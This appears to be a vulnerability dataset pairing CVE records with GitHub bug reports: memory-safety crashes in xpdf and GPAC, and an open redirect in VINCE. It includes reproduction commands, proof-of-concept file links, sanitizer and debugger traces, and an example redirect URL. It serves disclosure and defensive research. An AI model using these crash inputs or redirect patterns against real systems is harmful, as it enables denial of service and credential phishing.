cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-38238
2022-08-16T21:15:14.123
XPDF commit ffaf11c was discovered to contain a heap-buffer overflow via DCTStream::lookChar() at /xpdf/Stream.cc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jhcloos/xpdf/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jhcloos/xpdf/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xpdf_project:xpdf:3.04:*:*:*:*:*:*:*", "matchCriteriaId": "CAD71528-E16D-42E8-A422-05AAD924A832", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jhcloos/xpdf/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jhcloos", "xpdf" ]
Hi, in the lastest version of this code [ ps: commit id [ffaf11c](https://github.com/jhcloos/xpdf/commit/ffaf11c4f9ee0c4a124ec454f96c0f99ee699f10)] I found something unusual. ### crash sample [8id148_heap_buffer_overflow_in_lookChar.zip](https://github.com/jhcloos/xpdf/files/9278233/8id148_heap_buffer_overflow_in_lookChar.zip) ### command to reproduce `./pdftops -q [crash sample] /dev/null` ### crash detail ``` ================================================================= ==115813==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000038800 at pc 0x000000754566 bp 0x7ffe27e56210 sp 0x7ffe27e56208 READ of size 4 at 0x631000038800 thread T0 #0 0x754565 in DCTStream::lookChar() /home/bupt/Desktop/xpdf/xpdf/Stream.cc:2331:12 #1 0x68a82a in Object::streamLookChar() /home/bupt/Desktop/xpdf/xpdf/./Object.h:291:20 #2 0x68a82a in Lexer::lookChar() /home/bupt/Desktop/xpdf/xpdf/Lexer.cc:108:17 #3 0x68a82a in Lexer::getObj(Object*) /home/bupt/Desktop/xpdf/xpdf/Lexer.cc:458:17 #4 0x6ab867 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /home/bupt/Desktop/xpdf/xpdf/Parser.cc #5 0x6aa214 in Parser::getObj(Object*, int, unsigned char*, CryptAlgorithm, int, int, int, int) /home/bupt/Desktop/xpdf/xpdf/Parser.cc:69:21 #6 0x582f60 in Gfx::go(int) /home/bupt/Desktop/xpdf/xpdf/Gfx.cc:757:13 #7 0x581775 in Gfx::display(Object*, int) /home/bupt/Desktop/xpdf/xpdf/Gfx.cc:642:3 #8 0x6a76a1 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/xpdf/xpdf/Page.cc:360:10 #9 0x6d5f6e in PSOutputDev::checkPageSlice(Page*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/xpdf/xpdf/PSOutputDev.cc:3276:11 #10 0x6a7172 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/xpdf/xpdf/Page.cc:328:13 #11 0x6a6f81 in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/xpdf/xpdf/Page.cc:308:3 #12 0x6af9b4 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/xpdf/xpdf/PDFDoc.cc:384:27 #13 0x6af9b4 in PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/xpdf/xpdf/PDFDoc.cc:397:5 #14 0x796d81 in main /home/bupt/Desktop/xpdf/xpdf/pdftops.cc:342:10 #15 0x7f3e6975dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x41d5d9 in _start (/home/bupt/Desktop/xpdf/xpdf/pdftops+0x41d5d9) 0x631000038800 is located 0 bytes to the right of 65536-byte region [0x631000028800,0x631000038800) allocated by thread T0 here: #0 0x4afba0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7aa7fa in gmalloc /home/bupt/Desktop/xpdf/goo/gmem.cc:102:13 #2 0x7aa7fa in gmallocn /home/bupt/Desktop/xpdf/goo/gmem.cc:168:10 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/xpdf/xpdf/Stream.cc:2331:12 in DCTStream::lookChar() Shadow bytes around the buggy address: 0x0c627ffff0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627ffff0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c627ffff100:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627ffff150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==115813==ABORTING ```
heap_buffer_overflow_in_lookChar
https://api.github.com/repos/jhcloos/xpdf/issues/15/comments
1
2022-08-08T02:40:13Z
2022-08-13T04:34:46Z
https://github.com/jhcloos/xpdf/issues/15
1,331,243,403
15
3,983
CVE-2022-25799
2022-08-16T22:15:08.147
An open redirect vulnerability exists in CERT/CC VINCE software prior to 1.50.0. An attacker could send a link that has a specially crafted URL and convince the user to click the link. When an authenticated user clicks the link, the authenticated user's browser could be redirected to a malicious site that is designed to impersonate a legitimate website. The attacker could trick the user and potentially acquire sensitive information such as the user's credentials.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cret@cert.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html" }, { "source": "cret@cert.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CERTCC/VINCE/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CERTCC/VINCE/issues/45" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cert:vince:*:*:*:*:*:*:*:*", "matchCriteriaId": "996A047E-B6BD-4CA2-AFFE-25FD35000D66", "versionEndExcluding": "1.50.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/CERTCC/VINCE/issues/45
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CERTCC", "VINCE" ]
@JLLeitschuh (with help from CodeQL) reported this open redirect, which was fixed in 1.50.0: https://www.kb.cert.org/vince/comm/login/?next=https%3A%2F%2Fexample.com https://github.com/CERTCC/VINCE/blob/b986a8637b57c5cd8b2c5722f29f9893aef3f04c/cogauth/views.py#L768 https://github.com/CERTCC/VINCE/commit/b986a8637b57c5cd8b2c5722f29f9893aef3f04c While not a serious issue: https://bughunters.google.com/learn/invalid-reports/web-platform/navigation/6680364896223232/open-redirectors ...it could be considered CVE-worthy and handled as such. I'd be happy to write it up if that helps.
assign CVE ID for open redirect fixed in 1.50.0
https://api.github.com/repos/CERTCC/VINCE/issues/45/comments
4
2022-08-15T19:42:17Z
2022-08-17T14:42:42Z
https://github.com/CERTCC/VINCE/issues/45
1,339,408,309
45
3,984
CVE-2022-36186
2022-08-17T15:15:08.480
A Null Pointer dereference vulnerability exists in GPAC 2.1-DEV-revUNKNOWN-master via the function gf_filter_pid_set_property_full () at filter_core/filter_pid.c:5250,which causes a Denial of Service (DoS). This vulnerability was fixed in commit b43f9d1.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.1:dev:*:*:*:*:*:*", "matchCriteriaId": "2963671B-FA29-45DB-80B0-92F9E55F5159", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2223
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description:** `A crash happened on MP4Box(GPAC version 2.1-DEV-revUNKNOWN-master) due to a null pointer dereference vulnerability in gf_filter_pid_set_property_full function (filter_core/filter_pid.c:5250) . ` **MP4Box version** ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **poc** [poc.zip](https://github.com/gpac/gpac/files/9062544/poc.zip) **command** `./MP4Box -info poc` **crash output** ``` [AVC|H264] Warning: Error parsing NAL unit filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' ``` **gdb output** ``` pwndbg> r Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [AVC|H264] Warning: Error parsing NAL unit filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' [Inferior 1 (process 2239153) exited with code 01] pwndbg> b filter_pid.c:5250 Breakpoint 1 at 0x7ffff4b829f6: filter_pid.c:5250. (6 locations) pwndbg> r Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── RAX 0x0 RBX 0x7ffffffe8f50 ◂— 0x41b58ab3 RCX 0xfffffffd22a ◂— 0x0 RDX 0x7ffffffe9150 ◂— 0x2 RDI 0x613000000040 ◂— 0x613000000040 /* '@' */ RSI 0x504d5354 R8 0x0 R9 0x7ffff58cb4f0 (global_log_tools+496) ◂— 0x2 R10 0x7ffff24ab3f1 ◂— 'gf_filter_pid_set_property' R11 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 R12 0x613000000040 ◂— 0x613000000040 /* '@' */ R13 0x7ffffffe9150 ◂— 0x2 R14 0x504d5354 R15 0xfffffffd1ea ◂— 0x0 RBP 0x7ffffffe9060 —▸ 0x7ffffffe9380 —▸ 0x7ffffffea0d0 —▸ 0x7ffffffea170 —▸ 0x7ffffffea280 ◂— ... RSP 0x7ffffffe8f30 ◂— 0x0 RIP 0x7ffff4b841c6 (gf_filter_pid_set_property+182) ◂— test r12, r12 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► 0x7ffff4b841c6 <gf_filter_pid_set_property+182> test r12, r12 0x7ffff4b841c9 <gf_filter_pid_set_property+185> je gf_filter_pid_set_property+1477 <gf_filter_pid_set_property+1477> 0x7ffff4b841cf <gf_filter_pid_set_property+191> test r12b, 7 0x7ffff4b841d3 <gf_filter_pid_set_property+195> jne gf_filter_pid_set_property+1477 <gf_filter_pid_set_property+1477> 0x7ffff4b841d9 <gf_filter_pid_set_property+201> mov rax, r12 0x7ffff4b841dc <gf_filter_pid_set_property+204> shr rax, 3 0x7ffff4b841e0 <gf_filter_pid_set_property+208> cmp byte ptr [rax + 0x7fff8000], 0 0x7ffff4b841e7 <gf_filter_pid_set_property+215> jne gf_filter_pid_set_property+1447 <gf_filter_pid_set_property+1447> 0x7ffff4b841ed <gf_filter_pid_set_property+221> cmp r12, qword ptr [r12] 0x7ffff4b841f1 <gf_filter_pid_set_property+225> jne gf_filter_pid_set_property+1016 <gf_filter_pid_set_property+1016> 0x7ffff4b841f7 <gf_filter_pid_set_property+231> mov esi, r14d ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── In file: /home/fuzz/gpac2.1/gpac/src/filter_core/filter_pid.c 5296 5297 GF_EXPORT 5298 GF_Err gf_filter_pid_set_property(GF_FilterPid *pid, u32 prop_4cc, const GF_PropertyValue *value) 5299 { 5300 if (!prop_4cc) return GF_BAD_PARAM; ► 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); 5302 } 5303 5304 GF_EXPORT 5305 GF_Err gf_filter_pid_set_property_str(GF_FilterPid *pid, const char *name, const GF_PropertyValue *value) 5306 { ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7ffffffe8f30 ◂— 0x0 01:0008│ 0x7ffffffe8f38 ◂— 0x0 02:0010│ 0x7ffffffe8f40 —▸ 0x7ffffffe9030 —▸ 0x7ffff54af2c0 ◂— 0x6372636170672e /* '.gpacrc' */ 03:0018│ 0x7ffffffe8f48 —▸ 0x7ffffffe8f50 ◂— 0x41b58ab3 04:0020│ rbx 0x7ffffffe8f50 ◂— 0x41b58ab3 05:0028│ 0x7ffffffe8f58 —▸ 0x7ffff5640eff ◂— '1 48 100 11 szName:5290' 06:0030│ 0x7ffffffe8f60 —▸ 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 07:0038│ 0x7ffffffe8f68 —▸ 0x618000000c80 —▸ 0x7ffff6de03e0 (FileInRegister) —▸ 0x7ffff56a6580 ◂— 0x6e6966 /* 'fin' */ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► f 0 0x7ffff4b841c6 gf_filter_pid_set_property+182 f 1 0x7ffff4b841c6 gf_filter_pid_set_property+182 f 2 0x7ffff4c06993 gf_filter_pid_raw_new+595 f 3 0x7ffff4dc30b1 filein_process+2721 f 4 0x7ffff4c0eb6d gf_filter_process_task+3581 f 5 0x7ffff4bd4953 gf_fs_thread_proc+2275 f 6 0x7ffff4be0c67 gf_fs_run+455 f 7 0x7ffff462a677 gf_media_import+10263 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301 #1 gf_filter_pid_set_property (pid=pid@entry=0x613000000040, prop_4cc=prop_4cc@entry=1347244884, value=0x7ffffffe9150) at filter_core/filter_pid.c:5301 #2 0x00007ffff4c06993 in gf_filter_pid_raw_new (filter=filter@entry=0x618000000c80, url=0x603000000f40 "../../../test/segv2/poc", local_file=<optimized out>, mime_type=<optimized out>, fext=<optimized out>, probe_data=<optimized out>, probe_size=<optimized out>, trust_mime=<optimized out>, out_pid=<optimized out>) at filter_core/filter.c:3891 #3 0x00007ffff4dc30b1 in filein_process (filter=<optimized out>) at filters/in_file.c:481 #4 0x00007ffff4c0eb6d in gf_filter_process_task (task=0x607000000b10) at filter_core/filter.c:2639 #5 0x00007ffff4bd4953 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000000110) at filter_core/filter_session.c:1857 #6 0x00007ffff4be0c67 in gf_fs_run (fsess=fsess@entry=0x616000000080) at filter_core/filter_session.c:2118 #7 0x00007ffff462a677 in gf_media_import (importer=importer@entry=0x7ffffffeaa50) at media_tools/media_import.c:1226 #8 0x0000555555651a12 in convert_file_info (inName=<optimized out>, track_id=0x555555764fb0 <info_track_id>) at fileimport.c:130 #9 0x000055555562279f in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6265 #10 0x00007ffff1949083 in __libc_start_main (main=0x5555555f6a00 <main>, argc=3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478) at ../csu/libc-start.c:308 #11 0x00005555555f6afe in _start () at mp4box.c:6811 pwndbg> p pid $2 = (GF_FilterPid *) 0x613000000040 pwndbg> c Continuing. [AVC|H264] Warning: Error parsing NAL unit Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9810, dyn_name=0x0, prop_name=0x0, prop_4cc=1146050121, pid=0x0) at filter_core/filter_pid.c:5301 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ............ until....... pwndbg> p pid $3 = (GF_FilterPid *) 0x0 pwndbg> i b Num Type Disp Enb Address What 1 breakpoint keep y <MULTIPLE> breakpoint already hit 9 times 1.1 y 0x00007ffff4b829f6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.2 y 0x00007ffff4b8314e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.3 y 0x00007ffff4b834d1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.4 y 0x00007ffff4b8393e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.5 y 0x00007ffff4b83cc1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.6 y 0x00007ffff4b841c6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 pwndbg> n filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' [Inferior 1 (process 2239158) exited with code 01] ``` **source code** ``` 5246 static GF_Err gf_filter_pid_set_property_full(GF_FilterPid *pid, u32 prop_4cc, const char *prop_name, char *dyn_name, const GF_PropertyValue *value, Bool is_info) 5247 { 5248 GF_PropertyMap *map; 5249 const GF_PropertyValue *oldp; 5250 if (PID_IS_INPUT(pid)) { //**here**// 5251 GF_LOG(GF_LOG_ERROR, GF_LOG_FILTER, ("Attempt to write property on input PID in filter %s - ignoring\n", pid->filter->name)); 5252 return GF_BAD_PARAM; 5253 } ```
A NULL pointer dereference in gf_filter_pid_set_property_full
https://api.github.com/repos/gpac/gpac/issues/2223/comments
0
2022-07-07T10:26:55Z
2022-07-12T17:13:11Z
https://github.com/gpac/gpac/issues/2223
1,297,164,642
2,223
3,985
CVE-2022-36190
2022-08-17T15:15:08.543
GPAC mp4box 2.1-DEV-revUNKNOWN-master has a use-after-free vulnerability in function gf_isom_dovi_config_get. This vulnerability was fixed in commit fef6242.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2220" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2220" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/2220
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description** `Heap use after free in fuction gf_isom_dovi_config_get located in isomedia/avc_ext.c:2490` **System info** `ubuntu 20.04 lts` **version info:** ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **compile** ``` ./configure --enable-sanitizer make ``` **crash command:** `./MP4Box -info poc` **poc :** [poc.zip](https://github.com/gpac/gpac/files/9051242/poc.zip) **Crash output:** ``` [iso file] Unknown box type mp4u in parent stsd [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type drzf in parent dinf [iso file] Missing dref box in dinf [iso file] Incomplete box mdat - start 11495 size 853076 [iso file] Incomplete file while reading for dump - aborting parsing # Movie Info - 5 tracks - TimeScale 90000 Duration 00:00:22.839 (recomputed 00:00:22.848) Fragmented: no Progressive (moov before mdat) Major Brand isom - version 1 - compatible brands: Created: GMT Wed Sep 14 06:08:31 2078 Modified: GMT Wed Sep 14 06:08:33 2078 File has root IOD (96 bytes) Scene PL 0xff - Graphics PL 0xff - OD PL 0xff Visual PL: Simple Profile @ Level 1 (0x01) Audio PL: High Quality Audio Profile @ Level 2 (0x0f) 1 UDTA types: hnti: # Track 1 Info - ID 1 - TimeScale 90000 Media Duration 00:00:22.800 Track flags: Enabled Media Info: Language "Undetermined (und)" - Type "vide:mp4u" - 342 samples Visual Sample Entry Info: width=176 height=144 (depth=24 bits) Visual Track layout: x=0 y=0 width=176 height=144 ================================================================= ==2234976==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f000000130 at pc 0x7fbba822fbc0 bp 0x7ffe87b46740 sp 0x7ffe87b46730 READ of size 8 at 0x60f000000130 thread T0 #0 0x7fbba822fbbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490 #1 0x55f3db03107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862 #2 0x55f3db03ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994 #3 0x55f3db012ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367 #4 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 #5 0x55f3dafe7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd) 0x60f000000130 is located 0 bytes inside of 168-byte region [0x60f000000130,0x60f0000001d8) freed by thread T0 here: #0 0x7fbbab63440f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x7fbba825252d in unkn_box_read isomedia/box_code_base.c:793 #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fbba830615a in 